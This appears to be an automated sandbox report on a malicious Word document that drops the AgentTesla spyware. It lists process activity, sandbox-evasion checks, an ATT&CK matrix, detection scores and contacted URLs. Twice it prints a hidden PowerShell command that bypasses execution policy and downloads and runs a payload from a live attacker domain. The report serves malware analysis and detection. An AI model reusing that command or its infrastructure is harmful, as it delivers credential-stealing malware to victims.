                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1200Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2644Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1592Thread sleep time: -33000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1724Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 308Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2292Thread sleep count: 302 > 30
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1012Thread sleep count: 9438 > 30
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108Thread sleep count: 101 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Window / User API: threadDelayed 9438
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Thread delayed: delay time: 30000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: okcff.exe, 00000009.00000002.620634062.000000000079D000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    Injects files into Windows application
                    Source: C:\Windows\System32\notepad.exe | Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Bypasses PowerShell execution policy
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Memory written: C:\Users\user\AppData\Roaming\okcff.exe base: 400000 value starts with: 4D5A
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp | Binary or memory string: !Progman
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Queries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformation
                    Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Queries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    Yara detected AgentTesla
                    Source: Yara match | File source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR

                    Remote Access Functionality:

                    Yara detected AgentTesla
                    Source: Yara match | File source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | Windows Management Instrumentation211 | Path Interception | Process Injection212 | Disable or Modify Tools1 | OS Credential Dumping | File and Directory Discovery2 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | Scripting3 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information1 | LSASS Memory | System Information Discovery114 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | Shared Modules1 | Logon Script (Windows) | Logon Script (Windows) | Scripting3 | Security Account Manager | Security Software Discovery211 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | Exploitation for Client Execution33 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information2 | NTDS | Process Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol22 | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Command and Scripting Interpreter11 | Network Logon Script | Network Logon Script | Software Packing1 | LSA Secrets | Virtualization/Sandbox Evasion131 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | PowerShell3 | Rc.common | Rc.common | Timestomp1 | Cached Domain Credentials | Application Window Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading1 | DCSync | Remote System Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion131 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection212 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                    Behavior Graph

                    Behavior Graph ID: 553100 | Sample: 478644.doc | Startdate: 14/01/2022 | Architecture: WINDOWS | Score: 100
                    Top-level signatures: Found malware configuration; Sigma detected: Powershell download and execute file; Multi AV Scanner detection for submitted file; 16 other signatures.
                    WINWORD.EXE contacts mitmar-pl.com (37.0.9.166, ports 49167, 49168, 49169; WKD-ASIE, Netherlands); drops C:\Users\user\AppData\Local\...\okcff[1].exe (PE32), C:\Users\user\Desktop\~$478644.doc (data), C:\Users\user\AppData\...\abdtfhghgeghDp .ScT (data) and C:\Users\user\AppData\Local\...\7CE2D32D.png; starts two powershell.exe instances, notepad.exe and 2 other processes. Signatures: Document exploit detected (creates forbidden files); Suspicious powershell command line found; Tries to download and execute files (via powershell); Microsoft Office creates scripting files.
                    powershell.exe contacts mitmar-pl.com, drops C:\Users\user\AppData\Roaming\okcff.exe (PE32) and starts okcff.exe. Signature: Powershell drops PE file.
                    notepad.exe. Signature: Injects files into Windows application.
                    okcff.exe contacts mitmar-pl.com and starts cmd.exe (three shown) plus 7 other processes; the cmd.exe instances start timeout.exe (six shown) plus 3 other processes. Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Injects a PE file into a foreign processes.


                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    Source | Detection | Scanner | Label
                    478644.doc | 41% | Virustotal |
                    478644.doc | 31% | ReversingLabs | Document-Office.Trojan.RTFObfustream

                    Dropped Files

                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Roaming\okcff.exe | 100% | Joe Sandbox ML |

                    Unpacked PE Files

                    Source | Detection | Scanner | Label
                    41.0.okcff.exe.400000.5.unpack | 100% | Avira | TR/Spy.Gen8
                    41.0.okcff.exe.400000.7.unpack | 100% | Avira | TR/Spy.Gen8
                    41.0.okcff.exe.400000.9.unpack | 100% | Avira | TR/Spy.Gen8
                    41.0.okcff.exe.400000.13.unpack | 100% | Avira | TR/Spy.Gen8
                    41.0.okcff.exe.400000.11.unpack | 100% | Avira | TR/Spy.Gen8
                    41.2.okcff.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1138205

                    Domains

                    No Antivirus matches

                    URLs

                    Source | Detection | Scanner | Label
                    httP://mitmar-pl.com/okcff.ex | 0% | Avira URL Cloud | safe
                    http://mitmar-pl.com/Crkrqdrd.jpegi | 0% | Avira URL Cloud | safe
                    httP://mitmar-pl.com/okcff.exe | 0% | Avira URL Cloud | safe
                    http://mitmar-pl.com/Crkrqdrd.jpeg | 0% | Avira URL Cloud | safe
                    https://google.comD | 0% | Avira URL Cloud | safe
                    httP://mitmar-pl.com/okcff.exePE | 0% | Avira URL Cloud | safe
                    http://mitmar-pl.com | 0% | Avira URL Cloud | safe
                    http://www.%s.comPA | 0% | URL Reputation | safe
                    httP://mitmar-pl.com/ok | 0% | Avira URL Cloud | safe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                    Domains and IPs

                    Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mitmar-pl.com | 37.0.9.166 | true | true | - | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://mitmar-pl.com/okcff.exe | false | - | unknown
http://mitmar-pl.com/Crkrqdrd.jpeg | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp | false | - | high
http://www.piriform.com/cclean | powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmp | false | - | high
http://investor.msn.com | notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp | false | - | high
https://stackoverflow.com/q/14436606/23354 | okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | false | - | high
https://github.com/mgravell/protobuf-netJ | okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | false | - | high
httP://mitmar-pl.com/okcff.ex | powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-net | okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | false | - | high
http://mitmar-pl.com/Crkrqdrd.jpegi | okcff.exe, 00000009.00000000.439195914.00000000009F2000.00000020.00020000.sdmp, okcff.exe, 00000009.00000002.620997931.00000000009F2000.00000020.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hotmail.com/oe | notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp | false | - | high
httP://mitmar-pl.com/okcff.exe | powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://google.com/ | okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp | false | - | high
https://google.comD | okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
